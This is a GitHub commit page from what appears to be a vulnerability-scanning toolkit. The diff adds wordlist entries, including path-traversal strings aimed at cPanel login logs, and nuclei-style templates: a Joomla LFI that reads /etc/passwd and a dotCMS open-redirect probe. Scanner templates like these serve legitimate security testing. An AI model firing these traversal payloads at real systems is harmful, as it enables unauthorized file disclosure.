Skip to content

Commit dea0e92

Browse files
committed
add /server-info.action 2023-10-06
1 parent 372ed9e commit dea0e92

File tree

1,030 files changed

+1744
-148
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

1,030 files changed

+1744
-148
lines changed

brute/dicts/filedic.txt

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,8 @@
11
/Login.jsp
22
/login.jsp
33
.*org/login
4+
/confluence/server-info.action
5+
/server-info.action
46
../../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log%00
57
../../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log
68
../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log
File renamed without changes.
File renamed without changes.

config/51pwn/TPALL/CVE-2009-4223.yaml renamed to config/51pwn/CVE-2009-4223.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@ info:
66
reference:
77
- https://sourceforge.net/projects/krw/
88
- https://www.exploit-db.com/exploits/10216
9-
author:nithissh
9+
author: geeknik
1010
severity: high
1111
tags: cve,cve2009,krweb,rfi
1212

config/51pwn/CVE-2010-1313.yaml

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
id: CVE-2010-1313
2+
3+
info:
4+
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
5+
author: daffainfo
6+
severity: high
7+
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
8+
reference:
9+
- https://www.exploit-db.com/exploits/12082
10+
- https://www.cvedetails.com/cve/CVE-2010-1313
11+
- http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
12+
- http://www.securityfocus.com/bid/39237
13+
remediation: Upgrade to a supported version.
14+
classification:
15+
cve-id: CVE-2010-1313
16+
tags: cve,cve2010,joomla,lfi
17+
18+
requests:
19+
- method: GET
20+
path:
21+
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
22+
matchers-condition: and
23+
matchers:
24+
- type: regex
25+
regex:
26+
- "root:.*:0:0:"
27+
- type: status
28+
status:
29+
- 200
30+
# Enhanced by mp on 2022/02/14

config/51pwn/TPALL/CVE-2015-6477.yaml renamed to config/51pwn/CVE-2015-6477.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@ info:
66
reference:
77
- https://seclists.org/fulldisclosure/2015/Dec/117
88
- https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
9-
author: nithissh
9+
author: geeknik
1010
severity: medium
1111
tags: cve,cve2015,xss,iot,nordex,nc2
1212

config/51pwn/CVE-2018-17422.yaml

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
id: CVE-2018-17422
2+
3+
info:
4+
name: dotCMS < 5.0.2 - Open Redirect
5+
author: 0x_Akoko,daffainfo
6+
severity: medium
7+
description: |
8+
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
9+
reference:
10+
- https://github.com/dotCMS/core/issues/15286
11+
- https://www.cvedetails.com/cve/CVE-2018-17422
12+
classification:
13+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14+
cvss-score: 6.1
15+
cve-id: CVE-2018-17422
16+
cwe-id: CWE-601
17+
metadata:
18+
shodan-query: http.title:"dotCMS"
19+
verified: "true"
20+
tags: cve,cve2018,redirect,dotcms
21+
22+
requests:
23+
- method: GET
24+
path:
25+
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
26+
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
27+
28+
stop-at-first-match: true
29+
matchers-condition: and
30+
matchers:
31+
32+
- type: word
33+
part: body
34+
words:
35+
- "self.location = 'http://www.interact.sh'"
36+
37+
- type: status
38+
status:
39+
- 200

0 commit comments

Comments
 (0)